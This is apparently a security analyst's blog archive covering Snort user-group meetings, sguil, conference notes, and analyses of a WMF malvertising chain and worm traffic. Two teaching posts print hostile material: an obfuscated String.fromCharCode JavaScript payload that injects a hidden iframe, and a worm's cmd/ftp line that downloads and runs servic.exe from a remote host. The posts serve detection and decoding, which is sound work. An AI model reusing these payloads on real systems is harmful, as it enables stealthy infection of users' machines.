This is a fabulous idea. Most legitimate software distributors would be loath to see themselves listed on this site, and maybe it will spur them to clean up their act. However, the best thing about this site is their set of guidelines for software publishers. It reads very much like a software downloader's "bill of rights". For example, clause #2 states:

2. Prohibited Behavior. An application must not engage in deceptive, unfair, harassing or otherwise annoying practices. For example, an application must not:
            (a) use an end user's computer system for any purpose not understood and affirmatively consented to by the end user. This includes: for purposes of consuming bandwidth or computer resources, sending email messages, launching denial of service attacks, accruing toll charges through a dialer or obtaining personal information from an end user's computer such as login, password, or other account information;
            (b) intentionally create or exploit any security vulnerabilities in end user computers to cause the computer to malfunction;
            (c) trigger unwanted pop-ups, pop-unders, exit windows, or similar obstructive or intrusive functionality, that materially interfere with an end user's Web navigation or browsing or the use of his or her computer;
            (d) repeatedly ask an end user to take, or try to deceive an end user into taking, a previously declined action (such as repeatedly asking an end user to change his or her home page or some other setting or configuration);
            (e) redirect browser traffic away from valid DNS entries. (Except for applications that direct unresolved URLs to an alternative URL, provided that the destination page adequately informs the end user of the source of that page); or,
            (f) interfere with the browser default search functionality. (Except that an application may permit an end user to change his or her default search engine with proper disclosure, consent and attribution).

Here's a simple list of 6 things that software should never do, yet we see examples of each behavior every day. If software publishers stuck to this list, there would be no need for StopBadware.org. Until they do, though, you know where to look before downloading.

Tuesday, January 24, 2006

Notes from the ISSA/Infragard/ASIS Combined Meeting

Our local chapters of the ISSA, Infragard and ASIS are doing something smart: they're teaming up for quarterly joint meetings. I attended their first joint meeting this evening, and was impressed.

The first order of business after dinner was a brief introductory talk by the new SAC in charge of the local (Norfolk, VA) FBI field office, SAC Cassandra Chandler. SAC Chandler only spoke for about five minutes, but she had the audience in the palm of her hand. Infragard is an FBI-sponsored organization, and she emphasized the value that the organization provides to its members and to the FBI. I was very pleased that she pledged not only to continue to support the local chapter, but also to increase the level of support over time. By the end of her pep talk, I was ready to join myself!

The second speaker was Mr. Ron Kidd from the Regional Organized Crime Information Center in Nashville, TN. The ROCIC is one of several law enforcement related agencies that are cooperating on a project called the Automated Trusted Information Exchange (ATIX). ATIX is like a community of first responders from various government and industry first responders who get together to share information related to their particular professional "community". The idea is to help these responders prepare for disasters (natural or otherwise) by helping them keep up-to-date on current happenings that affect their field. For example, there's an ATIX community for public utilities, one for fire and rescue, etc. There was even one for the agricultural sector, with the sample page showing an article on agroterrorism.

ATIX provides its members a secure forum for posting news, information, links, articles, emails and other information of interest to first responders. Think "Internet Storm Center meets Wikipedia". A good idea, though it seems onerous to get to (you need their special access software, no doubt Windows-only) and, as the comparison to Wikipedia implies, there is essentially no fact-checking done for the information submitted by users. Still, there are useful features, like the page where you type in any cargo container ID number and it tells you the contents.

The theme for the evening was that we need more information sharing among the good guys. I agree wholeheartedly, but I was left wondering "Where are the people who make it all happen?" Our local ISSA, ASIS and Infragard chapters seem to be very management heavy, but light on the technical folks who can actually understand the issues and are in positions to do something about them. That's regrettable, and makes me wonder if these groups are having as much effect as they could.

On a side note, I did score this cool medallion from a friend of mine at the Navy Network Warfare Command, in return for a tour of our facilities. He's one of the people who "make it all happen", so I'm glad he goes to these meetings. Now if we can only get a few more like him to get out there and do some of that other kind of networking, we might have a shot at keeping ahead of the Bad Guys.

Monday, January 23, 2006

February HRSUG Meeting Announcement

The February meeting of the Hampton Roads Snort Users' Group (HRSUG) will be held at 7:00PM, Wednesday February 8th. We're fortunate enough to have Sourcefire's Judy Novak as our guest speaker. I've included Judy's bio and presentation abstract below. She literally "wrote the book" on Intrusion Detection, so I know you won't want to miss her presentation!


Date: 8 Feb 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040

Judy Novak's Bio
Judy Novak is a research engineer on Sourcefire's Vulnerability Research Team where she mangles packets for fun and research. She is the co-author of "Network Intrusion Detection". She has written and still maintains SANS "Intrusion Detection In-Depth" courseware. She has several patents pending for work performed at Sourcefire in passive operating system detection and target-based identification of fragmentation and TCP stream reassembly.

Presentation Abstract
Judy's presentation, entitled "Target-BasedTCP Stream Segment Overlaps", discusses current research and future functionality of Snort's upcoming stream5 TCP preprocessor. She will demonstrate how overlapping TCP segments can be used to identify a remote operating system by crafting packets using a tool known as scapy. This talk assumes the audience has a basic understanding of TCP.

Tuesday, January 17, 2006

ShmooCon 2006 Wrap Up

Having recently returned from ShmooCon 2006 (and having further spent most of yesterday resting and recovering), here's my brief writeup: "Go next year."

Ok, here's my slightly less brief writeup. I arrived around 1:00PM Friday. Giant kudos to the registration team, who checked me in without delay. In fact, they checked in nearly everyone without delay, thanks to the nifty bar codes they emailed to the registered attendees. Print it out, scan it and get a conference bag. It was great. What was even better about it was that the badges had no name tag. They were just (sharp) metal access tokens, and if you had on around your neck, you were in. Good for anonymity, though a little annoying at times when I think I should know someone's name, but don't.

I don't want to give a blow-by-blow account, because

  1. that's boring
  2. others have done it better
  3. it's still boring
I would like to mention several of my favorite presentations, though, in roughly chronological order.

First, Dan Moniz and Patrick Stach presented their work on creating an exhaustive rainbow table for LANMAN ("Breaking LanMan Forever"), which was a little math-y but in the end they've made the results available. The good thing about this is that by going for a guaranteed complete coverage instead of a statistical coverage, they reduced the number of tables you have to search through to find password hashes, and avoiding the overlap speeds things up a lot. Good job guys.

Second, Acidus' talk on "Covert Crawling" (a spider that is indistinguishable from a set of human visitors) was pretty fun. Nothing terribly high-tech, but he's thought through a lot of the problems and solved most of them. Should be good code when it's released.

Dan Kaminsky's talk on "Black Ops of TCP/IP 2005.5" was, of course, stellar. IP fragmentation timing attacks. Genius.

I also enjoyed Lasse Overlier and Paul Syverson's talk on detecting hidden services in Tor, and the upcoming countermeasures to these attacks. Makes me want to go right out and hide something!

Deviant Ollam's lockpicking talk scared the hell out of me, and I've pretty much sworn off all locks by now. Only trained attack dogs for me from now on.

And of course, the highlight of the con was Johnny Long's "Hacking Hollywood" presentation. The image of hackers and hacking in the movies has always fascinated me, and it was nice to see such an informed send-up. Hillarious and timely. I can't wait for the video to be released!

So, this was my first ShmooCon, but it won't be my last!

PS. Richard Bejtlich and I did a talk on sguil. It went well, I thought. In case you were wondering.

Monday, January 09, 2006

January HRSUG Meeting Reminder

I'd like to remind everyone that the January meeting of the Hampton Roads Snort Users Group (HRSUG) will be held this Wednesday, January 11th at 7:00PM. This will be an important meeting, since we will open the nominations for the positions of Chair and Vice Chair. These are light-duty positions, mostly consisting of filling out the library's reservation sheets every month to get the meeting room and helping to arrange for a presentation. Please consider nominating yourself or another member for one of these positions.

As for a technical presentation, I will be demoing sguil, an open source Network Security Monitoring (NSM) tool. Sguil incorporates NIDS information (snort), network session data and packet logging into a single analyst console/research tool. I'll be showing how sguil can help you save time, save money and improve your detection program at the same time. Part of the presentation details exactly how I used sguil to investigate an attempted WMF exploit being delivered by popup ads. If the Internet connection works out, we can even do a live demo.

Location details are below. Hope to see you there!


Date: 11 Jan 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040
Meeting room B

Thursday, January 05, 2006

Sguil at ShmooCon 2006

Going to ShmooCon 2006 next week? So is sguil! Fellow sguil project member Richard Bejtlich will present sguil in a talk entitled Network Security Monitoring with Sguil. As part of this session, Richard has invited me to present a case study on how I used sguil to investigate my recent WMF exploit attempt. Should be a lot of fun!

Wednesday, January 04, 2006

How to pwn a million computers without breaking a sweat

There has been a lot of discussion about the Microsoft WMF vulnerability recently, and I frankly don't feel that I have much to add. You're either already taking preventative measures, you're awaiting the patch, or both. But I came across a particular infection attempt today which, while not unusual, is a good example of how an exploit for this sort of vulnerability could get delivered to a victim's PC even without them necessarily doing anything "risky". It happens to involve a WMF file, but I've seen it in the past with other types of image-related vulnerabilities as well.

IMPORTANT SAFETY NOTE: This information is based on an actual incident. I have obscured the names of most of the systems involved in part to protect the reputations of their owners, but mostly to prevent people from trying to click on them.

The scenario begins as the user (we'll call him Fred) is browsing through a popular website, in this case MySpace.com, but really it it wasn't involved in the attack itself. I only include it here because it's the start of the "web session" the user was involved in, and so it also seemed like a logical place to pick up the narrative.

In case you don't have a teenager, MySpace is a free online community that's insanely popular <old_fart>amongst the youth of today</old_fart>. It's kind of like a cross between a free website host, a blog and IM all rolled into one. The point is that each MySpace user gets their own web page/blog/buddy list/chat board page to do with as they wish. Other registered MySpace users can post messages of their own on the page when they visit, and these are automatically tagged with the visitor's name and personalized photo or icon. Later, when someone views the comments, any of the posters who happen to also be using MySpace at the time will also have a special "online" indicator displayed beside their name.

All these messages, icons and status indicators are user-customizable, and this drives many people to learn some basic HTML. Of course, if you don't feel like learning HTML, you can go to any number of websites that will generate HTML on the fly for you to paste into your own web pages.

So Fred was viewing someone's MySpace page, and apparently one of the posters was online at the time. That caused their "online status" icon to be displayed along with their name, and apparently this was linked back to one of these HTML helper websites, from which it had originally been generated. We'll call the site HTMHelper (not the real name, but the exact site isn't important either).

Here's where it starts to get interesting.

HTMHelper has many pages and is quite extensive. To help support this service, the site owners have made deals to display ads from several ad distribution companies. The HTMHelper page contained a small bit of JavaScript code to generate "pop under" ads (like popups, but they appear under your browser window so you don't see them until later). The ad provider, let's call them cash4popupads.com, is part of a whole
chain of (often sleazy) ad brokers, and it's quite common for ad brokers to get ads from other ad brokers, who got them from other ad brokers, who get them from... you get the idea. Ultimately, there is an individual who registers with one of these ad distribution services, but there are usually several levels between the person
placing the ads and the service that eventually places it on a web page where you'll see it.

In this case, cash4popupads displayed a popunder window that contained nothing but a redirection to the real ad, hosted on a server operated by a site we'll call spf99.biz. Technically, it was an invisible 1 pixel square IFRAME, but you get the idea. cash4popupads was just the conduit, while spf99 served the ad itself.

Spf99 is registered in Herndon, VA, by the way. It doesn't make any difference to this story, but it's an interesting fact. There are a lot of government and government contractors in that area, since it's basically part of the whole Washington DC/Northern VA megalopolis, but that could just be a geographical coincidence. I have no way of knowing, but it did make me wonder.

Spf99 served up the actual infected file, "/tape/XXXXX101.wmf". Their internal tracking number indicates that this file was supplied by customer number 101 ("affiliate=101" was part of the URL). I don't know who affiliate 101 is, and it could very well be another ad distribution company.

In case you missed the implication, ad services don't work for free. Everyone along the way has to take a cut from every ad delivery and/or clickthrough. This means that whoever supplied the file had enough money to pay for it to be widely distributed through the various levels of the ad networks.

If you've followed the security news through 2005, you'll know that the lone hacker is on the way out, and nation states and organized crime are where the serious hacking is going on now. This is a good example of that trend. In the past, someone would get a website with a free hosting provider and then try to get people to visit their site by sending spam, posting to discussion forums or using some similar technique. That's inefficient, so now they just pay ad networks to distribute their exploits for them. They don't do this unless they're expecting a healthy return on their investment, of course.

Anyway, I thought this might be an interesting peek into the seamy side of exploit distribution, and quite timely too, since we've recently been discussing this particular exploit. Hope you enjoyed it.

Update 2006-01-05 06:49:00
I should have mentioned this before, but all this analysis was made possible by sguil. A Snort alert tipped me off to the exploit attempt itself, and I generated an ASCII session transcript from the packet logs to verify it. I was then able to search through all network sessions involving the target machine around that time, and used additional transcripts of those sessions to establish the chain of events leading up to the exploit attempt itself. I even recovered the WMF file from the packet logs and was able to search network sessions for the download server listed within, which was a great way to verify that the exploit had not been successful. Network Security Monitoring to the rescue!

Tuesday, January 03, 2006

ISC is getting cranky

Judging by their latest entry, the Internet Storm Center is experiencing just a little frustration over the whole Microsoft WMF thing. I can't say that I blame them at all, I just think it's amusing, and Microsoft's response to the whole thing has been a farce.

Sguil is not a SIM

While catching up on the mailing list traffic I skipped over the holidays, I read this post on DailyDave. The email deals with SIM technology, specifically the feasibility of a good Open Source SIM. The section below (by Anton Chuvakin) caught my eye:

IMHO, Sguil follows a wrong model, since it requires a smart analyst in front of the console, something that most companies likely won't afford.

I don't want to start a fight, but I've been seeing a lot of recent references implying that sguil is a SIM, or that it competes with/replaces SIMs. That could not be further from the truth. Here's the reply I sent to the mailing list:

Don't confuse sguil with a SIM. SIM implies a level of aggregation and automation that is not appropriate for this type of Network Security Monitoring (NSM) tool. Although there are superficial similarities, they're not intended for the same purpose.

Sguil is simply a research tool for a number of specialized databases (starting with NIDS, session and pcap data). It relies on a trained analyst simply because it's not possible to do otherwise. The Bad Guys are smart, and their capacity for underhandedness far exceeds the ability of software to detect or respond. Trained security personnel are indispensable not only for their ability to detect misuse, but also for their reasoning skills and their investigatory capacity. These are the sorts of operations sguil is designed to support.

If you want to talk about following the wrong model, trying to replace trained security personnel with a software solution is pretty high up on the list.

My fellow #snort-gui channel monkey jofny also had this to say:

A SIM's job is to present analysts with event combinations of interest which are unusual or otherwise show additional evidence of being worth investigating beyond what is presented by individual sensors/events

This is entirely correct, and it really points to the difference between NSM and SIM. Although a SIM might tip you off about a possible problem, you need an dedicated NSM solution (like sguil) to support a more detailed analysis. This implies that it's quite possible, and maybe even desirable, to run both SIM and NSM solutions in a complementary fashion.

I hope this clears things up a bit.

Update 2006-01-03 13:13: TaoSecurity has picked this up, too. I especially like the detailed comment someone left.

Thursday, December 22, 2005

Decoding JavaScript document.write() alerts

I got some good feedback on my previous post about decoding HTTP challenge/response alerts, so I thought I'd try again. This time, the topic is decoding JavaScript document.write() alerts.

JavaScript includes a method for a script to modify the current web page (the "document"). The document.write() function call is used to add new content to the page, and this can also add new JavaScript code to be executed. This is a common obfuscation technique, often intended to make it more difficult for analysts or NIDS systems to detect qustionable content.

Here's an example to show what this looks like in the real world:

document.write(String.fromCharCode(60,115,
99,114,105,112,116,32,108,97,110,103,117,
97,103,101,61,34,74,97,118,97,83,99,114,
105,112,116,34,32,116,121,112,101,61,34,
116,101,120,116,47,106,97,118,97,115,99,
114,105,112,116,34,62,60,33,45,45,13,10,
100,111,99,117,109,101,110,116,46,119,
114,105,116,101,40,39,60,105,102,114,97,
109,101,32,115,116,121,108,101,61,34,100,
105,115,112,108,97,121,58,110,111,110,
101,34,32,119,105,100,116,104,61,34,49,
34,32,104,101,105,103,104,116,61,34,49,34,
32,102,114,97,109,101,98,111,114,100,101,
114,61,34,48,34,32,115,99,114,111,108,108,
105,110,103,61,34,78,111,34,32,115,114,99,
61,34,104,116,116,112,58,47,47,115,46,101,
117,119,101,98,46,99,122,47,39,43,40,40,40,
110,61,77,97,116,104,46,102,108,111,111,
114,40,52,53,42,77,97,116,104,46,114,97,110,
100,111,109,40,41,41,41,60,53,41,32,63,32,39,
115,116,101,112,39,43,40,110,43,50,41,43,39,
46,112,104,112,39,32,58,32,39,101,110,103,
105,110,101,115,46,112,104,112,63,110,111,
61,39,43,40,110,45,52,41,41,43,39,34,62,60,
47,105,102,114,97,109,101,62,39,41,59,13,10,
47,47,45,45,62,60,47,115,99,114,105,112,116,62));

Notice the "String.fromCharCode()" function. That's the key to deciphering this. Each of the numbers in the list is just the decimal ASCII code of the corresponding character in the script that this is intended to create.

Once you realize how this works, reconstructing the script itself is trivial. I usually use the following perl command line, then cut and paste just the ASCII list into its standard input, like so (my input is in bold):

% perl -e 'while(<>) { @list = split /,/; grep {print chr($_);} @list; }'
60,115,99,114,105,112,116,32,108,97,110,
103,117,97,103,101,61,34,74,97,118,97,83,99,
114,105,112,116,34,32,116,121,112,101,61,34,
116,101,120,116,47,106,97,118,97,115,99,114,
105,112,116,34,62,60,33,45,45,13,10,100,111,
99,117,109,101,110,116,46,119,114,105,116,
101,40,39,60,105,102,114,97,109,101,32,115,
116,121,108,101,61,34,100,105,115,112,108,
97,121,58,110,111,110,101,34,32,119,105,100,
116,104,61,34,49,34,32,104,101,105,103,104,
116,61,34,49,34,32,102,114,97,109,101,98,
111,114,100,101,114,61,34,48,34,32,115,99,
114,111,108,108,105,110,103,61,34,78,111,
34,32,115,114,99,61,34,104,116,116,112,58,47,
47,115,46,101,117,119,101,98,46,99,122,47,39,
43,40,40,40,110,61,77,97,116,104,46,102,108,
111,111,114,40,52,53,42,77,97,116,104,46,114,
97,110,100,111,109,40,41,41,41,60,53,41,32,
63,32,39,115,116,101,112,39,43,40,110,43,50,
41,43,39,46,112,104,112,39,32,58,32,39,101,
110,103,105,110,101,115,46,112,104,112,63,
110,111,61,39,43,40,110,45,52,41,41,43,39,
34,62,60,47,105,102,114,97,109,101,62,39,
41,59,13,10,47,47,45,45,62,60,47,115,99,
114,105,112,116,62


I've omitted the actual output here, since it would be JavaScript and I don't want to load the code into your browser by accident, but feel free to try this on your own and see what JavaScript nuggets you can dig up.

Thursday, December 15, 2005

China refutes hacking charges

I mentioned Titan Rain several months ago, but it's back in the press again, mostly because Allan Paller is using it to flog the new SANS Technology Institute.

No matter. It's news again, and this time China is coming out with a stunning defense. From The Standard:

"We have clear stipulations against hacking. No one can use the Internet to engage in illegal activities," foreign ministry spokesman Qin Gang told a regular briefing Tuesday.

"The Chinese police will deal with hacking and other activities disturbing social order in accordance with law."

I also enjoyed this quote:

"I'm not sure about the American accusations," Qin said.

"If they have proof, they should tell us."

Now, I'm not saying that I think the Chinese government is sponsoring this. I'm also not saying that I think they're innocent. The fact is, we don't know. Despite Paller's ludicrous assertion that these attacks could only have been executed by a military organization, the fact is that their origin is still a mystery, at least in the open press.

So what is my point? Simply that, while we don't know for sure, I do find it very plausible that the Chinese government is behind these attacks, either directly or indirectly. China has a long history of espionage. There's a very thorough book, The Tao of Spycraft: Intelligence Theory and Practice in Traditional China that documents this in detail.

Denials count for nothing. If the Chinese government wants us to believe they're not behind the attacks, they should help us investigate and find the attackers. Until that happens, we have to assume that China could in fact be behind the attacks.

Wednesday, December 14, 2005

January HRSUG Meeting Announcement

The January meeting of the Hampton Roads Snort Users Group (HRSUG) will be held on Wednesday, January 11th at 7:00PM. This will be an important meeting, since we will open the nominations for the positions of Chair and Vice Chair.

As for a technical presentation, I will be demoing sguil, an open source Network Security Monitoring (NSM) tool. Sguil incorporates NIDS information (snort), network session data and packet logging into a single analyst console/research tool. I'll be showing how sguil can help you save time, save money and improve your detection program at the same time.

Location details are below. We had a good turnout for the last meeting, and I hope this one will be even better. See you there!


Date: 11 Jan 2006
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040
Meeting room B

Saturday, December 10, 2005

Some InstantNSM love

Thanks to my friend and fellow sguil user Geek00L for showing some love to my Network Security Monitoring project, InstantNSM. It's my attempt to make sguil easier to deploy. If you've been scared off by the complexity of NSM, check it out and let me know what you think.

Friday, December 09, 2005

Sguil 0.6.0p1 Released

Ok, it turns out there was a fairly serious "crash-the-server" bug in the 0.6.0 release. If you're using that, you should probably upgrade to 0.6.0p1 immediately.

Thursday, December 08, 2005

Decoding "Challenge/Response Authentication" alerts

If you're using Snort for IDS operations and have downloaded the BLEEDING-EDGE rules, you've probably noticed a lot of alerts called "BLEEDING-EDGE VIRUS HTTP Challenge/Response Authentication". This type of alert may seem quite mysterious, but in reality, this is most likely worm traffic (see the ISC Handler's Diary entry on the subject).

If you look at an ASCII transcript of the traffic (thanks, sguil!), you'll see something like the following:

GET / HTTP/1.0
Host: 192.70.245.110
Authorization: Negotiate IQegYGKwYBBQUCoIIQbjCCE[...]
RERERERERERERERERERERERERERE==

So what is this traffic? Well, IIS allows a client to negotiate the type of HTTP authentication scheme, which is the purpose of the "Authorization: Negotiate" line (more info on this capability can be found here and here). Unfortunately, there is a buffer overflow in some versions of this facility, which could allow the remote execution of arbitrary code. That's what all that extra junk at the end of the request is.

The overflow is encoded in Base64 (as per the Negotiate protocol). Want to unencode it and see what's there? Easy! On my Linux box, I used the following Perl command to set up a simple decoder, then cut-and-pasted the ASCII text into the window.

perl -e 'use MIME::Base64; $line = <>; chomp($line); $out = decode_base64($line);print "\n\n$out\n";' | & less

What you'll see is a bunch of junk, mostly buffer padding and shellcode, but with some plaintext commands visible in the middle. The exact commands vary a bit depending on exactly what code is attacking you, but they usually look similar to this:

cmd /k echo open 192.168.1.101 15801 > o&
echo user 1 1 >> o &echo get servic.exe >> o &
echo quit >> o &ftp -n -s:o &del /F /Q o &
servic.exe

See what that does? It creates an FTP script to log in to a remote host and fetch a file. Then it runs FTP with that script to actually download the infection code, and runs it. It's even sharp enough to delete the temporary FTP script.

One interesting thing to note is that it seems to use the attacking host's IP address, which in this case was probably behind some sort of NAT firewall, so this would have failed to spread the infection even if we had been vulnerable.

Anyway, now you know.

Sober worm pulls an interesting trick...

Check out this article from F-Secure's blog. According to it, Sober.Y has an ingenious method for "calling home" to download updates that resists efforts to block or shut down the URLs it uses.

According to the article, the worm tries to download its updates from URLs which are calculated in part based on the date. The actual URLs themselves aren't registered, but when the owner of the worm wants to send out an update, he simply calculates the day's URL, registers it, and places his content there for download.

It's a bit harder to shut things down if they don't exist yet, but fortunately the F-Secure guys reverse engineered the algorithm, which lets them predict the URLs too. They were apparently the ones who tipped off the German police, who in turn issued a statement last month on the subject.

Neat idea on the part of the author, but now that the algorithm is known, I guess it won't do him as
much good as he had hoped.

Wednesday, December 07, 2005

The other gift that keeps on giving

That's the gift of security, of course. Why not take a tip from this Computerworld column and choose Christmas gifts that promote good security practices as well?

If you were writing this list, what you would you include?

Tuesday, December 06, 2005

December HRSUG Meeting Report

As both of you who read my blog know, last Thursday was the December HRSUG meeting. Jason Brvenik and Jennifer Steffens from Sourcefire attended our inaugural meeting, as did several members of the local security community.

We started out by discussing some organizational matters, and found that everyone was interested in meething on a monthly basis. Until people get to know each other at least a little bit, we've decided to defer electing officers. Nominations will be taken at the January meeting, with an election to be held in February. In the meantine, we can use the mailing list to introduce ourselves.

With introductions and administrative matters out of the way, Jason gave a talk about the advantages of target-based IDS. The idea is that the more you know about your network, the better you can protect it. In the IDS world, this means that you can provide more accurate detection and perhaps boost performance by telling Snort more about the targets (hosts) on your network. Jason discussed the upcoming snort configuration language changes as well as some neat new realtime updating capabilities for loading new configuration into a running snort process. Expect to see these new features rolled out in stages between now and 2007.

Our presentation was followed by an optional "offsite networking event" which was also quite successful.

In short, I think a good time was had by all. Thanks for everyone who showed up, and I'm looking forward to an even better meeting for January! Stay tuned!

Thursday, December 01, 2005

Sguil 0.6.0 released!

Sguil is the de facto reference implementation for Network Security Monitoring (NSM). Sguil 0.6.0 was released today!

Tired of not having the data necessary to properly follow up on your IDS alerts? Give sguil a try. It integrates alerts (via Snort), network session data and full packet logging into a single easy-to-use analyst console.

For more information about sguil, see my presentation on the subject. Also check out my related project, InstantNSM.

Tuesday, November 29, 2005

Need a better reason to come to HRSUG?

You're probably tired of hearing me talk about it, but the first Hampton Roads Snort Users Group (HRSUG) meeting is this week (details here). As if networking with your peers or listening to our guest speaker weren't enough, there's one more reason to come... free training!

The folks at Sourcefire have donated a training package door prize worth almost $2,000. In short, if you attend and are the lucky winner, you'll get:



I've recently taught both of these classes, and I can tell you from my personal experience that they're very good. The winner will have their choice of instructor-led classroom training or the self-paced online classes. Other meeting attendees can register for the same classes/exam at a 50% discount through December 31st, 2005.

So... you're coming, right?

Monday, November 28, 2005

On the dangers of speaking outside your area of competence

Ok, this is just dumb. According to this article, Richard Carrigan, a physicist at Fermilab, is concerned that aliens (as in E.T.) are going to "infect the Internet". He claims that the signals processed by the millions of computers participating in the SETI@Home distributed computing project are capable of carrying malicious code, and the SETI project should implement some sort of signal quarantine to protect us. Kind of like a reverse Jeff Goldblum manoeuver from Independence Day.

The thing is, this isn't a very likely scenario. First, the signals are data, and not executable code. That's our first layer of protection.

Now, we could posit a software flaw in the SETI@Home client that could lead to some sort of overflow that allowed arbitrary code to be executed, but in order for aliens to successfully exploit it, they'd need to know an awful lot about how our computers work, and about our current software versions, and the laws of physics are working against them.

The closest star is about 4.5 light years away from Earth. Assuming that we broadcast complete technical details of the x86 architecture and an entire copy of the Windows OS, along with a comprehensive set of security bulletins and an SDK, the necessary roundtrip time for data travelling at the speed of light would mean that by the time the "exploit" could arrive here, we'd be about 9 years further on. Let's see, 9 years ago, we'd all have been running NT 4 and Windows 95. Good luck trying a Win95 overflow on my XP system! The offsets are wrong now, and new security technologies exist now that weren't dreamed of then (like the non-executable stack). What will we have 9 years from now? I don't know (and neither do the aliens), but I do know the aliens don't stand a chance.

Seriously, I think he's missing the point. If you want to be concerned with the security of the SETI@Home software or their new replacement, BOINC, don't bring aliens into the picture. Security concerns are legitimate, yes, but it is far more likely that if a software bug does exist that allows remote code execution, it'll be exploited by a human, not an alien.

Unless, of course, you believe this guy.

Update 2005-11-28 09:48 -- Check out Richard Carrigan's website for more information on his idea. There's a presentation and a copy of his paper on the subject.

Sunday, November 27, 2005

HRSUG Meeting Reminder

Just a reminder that the inaugural meeting of the Hampton Roads Snort Users Group (HRSUG) is just around the corner! Read the meeting details, then join the mailing list!

Thursday, November 10, 2005

HRSUG Mailing List

As you may know, I recently announced the formation of a new Snort users' group in the Hampton Roads, VA area. I'm happy to say that the group's mailing list is now available. If you want to be kept up to date on our meeting schedule, or if you just want to connect with other security people in the area, sign up now!

Wednesday, November 09, 2005

RSA: Phishing experiments hook net users

Here's a nifty RSA press release describing a recent experiment they conducted in NYC. Experimenters posed as tourism pollsters and in most cases were able to gather enough information from their subjects to divine possible passwords they might use for their various accounts. Oddly, most people wouldn't give out their password itself, or the method by which they come up with new passwords.

The article points out that the most likely explanation is that most people just aren't aware of how other personal information can be used as "back doors" (e.g., by using the mother's maiden name to reset "forgotten" passwords). I'm kind of at a loss on this one. Who hasn't had to set up a security question for this purpose? Are people setting these up and forgetting about them, or maybe blindly answering the questions without understanding the purpose of collecting the information?

Here's what I'd like to do. I'd love to repeat this experiment, with a twist. At the end of each interview, hand the person a scorecard telling them how well they protected their information, and providing suggestions for improvement. Be sure to give examples of how each piece of requested information could have been used against them. That way you gather results and educate the public at the same time.

Friday, October 28, 2005

Open source exploit programming tools for Windows

Michael Boman has just posted a short article in which he details some open source tools he uses for "exploit engineering" on the Windows platform. I'm not as familiar with the Windows development tools as I am with their Unix counterparts, but I might have to try some of these myself.

Apparently more articles in this series are under development.

Thursday, October 27, 2005

Hampton Roads Snort Users Group

As some of you know, I've been wanting to meet more infosec pros in my local area (sounds like the beginning of a 900 number ad). I started by volunteering as a SANS Local Mentor, and that worked very well, but now I'm going to take the next step.

I've been working with the fine folks at Sourcefire to help me create a local Snort Users Group, and I'm finally ready to announce our first meeting!


Date: 1 Dec 2005
Time: 7:00PM
Place: Williamsburg Regional Library
515 Scotland Street
Williamsburg, VA
(757) 259-4040
Meeting room B

The speaker for our inaugural meeting will be Sourcefire's Jason Brvenik, who will fill us in on the new target-based IDS technology that they are incorporating into the open source Snort code.

By the way, don't let the group's name fool you. Even if you're not interested in Snort itself, please consider attending anyway. Most Snort user groups cover a variety of security-related topics, and that's what I want for this one, too. So if you want to meet some of your peers in an informal setting and learn some of the newest happening in the security world, HRSUG is for you!

Please pass the word, and contact me (david vorant com) if you'd like any more information.

Monday, October 24, 2005

Risks vs. Vulnerabilities vs. Threats

My experience tells me that a lot of people are still confused over the differences between risks, threats and vulnerabilities. In fact, even security pros (who should know better) often find themselves misusing the terms in casual conversation. The following simple analogy may help clarify the situation:

Imagine that you are going on a trip. While packing your suitcase, you realize that you need to bring some shampoo. Your shampoo has a flip top, not a screw top, and so you're concerned that if you pack your bag too full, the airport baggage handlers might treat your bag roughly, exerting excess pressure on the bottle and popping the top. Shampoo could spurt all over your stuff!

In this scenario, you have a vulnerability (the flip top shampoo bottle which might not survive a good squeeze). The threat is that baggage handlers are not known for being gentle. The risk is that your clothes might get doused with shampoo.

Change any one of these conditions and you don't have anything to worry about. If you remove the vulnerability by taking a screw top bottle instead, your clothes will be fine because even the baggage monkeys can't rupture a properly made bottle (you hope). Similarly, if you decide to carry your luggage on, you can probably avoid the baggage handlers altogether, and you will naturally be more careful with your own bag.

While we're on the subject, let's carry the analogy a bit further and talk about countermeasures. There are four basic types of countermeasures: Preventative, Reactive, Detective and Administrative. Preventative countermeasures work by keeping something from happening in the first place. In the example above, enclosing the bottle in a rigid plastic box would certainly help keep it from being crushed, and would count as a preventative countermeasure.

A reactive countermeasure comes into play after an event has already occurred. If you arrived at your hotel and found that your clothes were, in fact, covered with goo, you could make use of the hotel's laundry to correct the problem. This would be an example of a reactive countermeasure.

I can't really think of a realistic example of a detective measure here (a shampoo sniffing dog?) so finally, an administrative countermeasure uses policy to protect an asset. In this case, you could attempt to avoid the situation by making it your policy to rely on the hotel's shampoo, thus removing your need to bring your own.

I hope this has made things a little more clear. It is the combination of the vulnerability (the flip top shampoo bottle) and the threat (baggage monkeys at the airport) that creates a risk (to the clothes). You can attempt to use various countermeasures to bring the risk down to acceptable levels, or you could simply accept the risk and move on.

Of course, as I am a devious person, I might choose to take a different option. I can always transfer the risk by packing the shampoo in my wife's bag. I'll leave you to do your own risk analysis for that one...

Friday, October 21, 2005

Why 419?

The Los Angeles Times is running a great behind-the-scenes story on Nigerian 419 scams, entitled I Will Eat Your Dollars. I think this is the best thing I've ever read on the subject, as it follows an actual scammers in Lagos. The story goes into detail on how the scammer, Stephen (19 yrs old), got into the business and why it was so attractive to him and his colleagues. If you have any interest at all in the subject, you really should read this article.

Monday, October 17, 2005

What your printer is telling the world about you.

The Electronic Frontier Foundation has published a short but extremely disturbing release in which they describe the secret watermarks your color laser printer could be placing on all your printed pages. Apparently the Secret Service has negotiated the inclusion of secret watermarks (in the form of patterns on yellow dots) on printers from a variety of manufacturers. This page contains a more technical explanation of how to see these little yellow dots and what they mean. There's also an interactive form you can use to submit your own dot pattern for decoding.

I've said that I find this very disturbing, and here's why: the government has neither the right nor the legitimate need to track arbitrary documents printed by its citizens. Frankly, this is the sort of thing I expect to hear about China, not the US.

Thursday, October 06, 2005

Attorney-client privilege for pentest results

What an interesting idea. this article's thesis is that pentest results can potentially be used against the company that ordered the test. In court, opposing counsel could use them to argue that the company failed to exercise due dillegence in protecting its assets.

The solution? Have your attorney arrange the pentest, and then the results will be covered under attorney-client privilege.

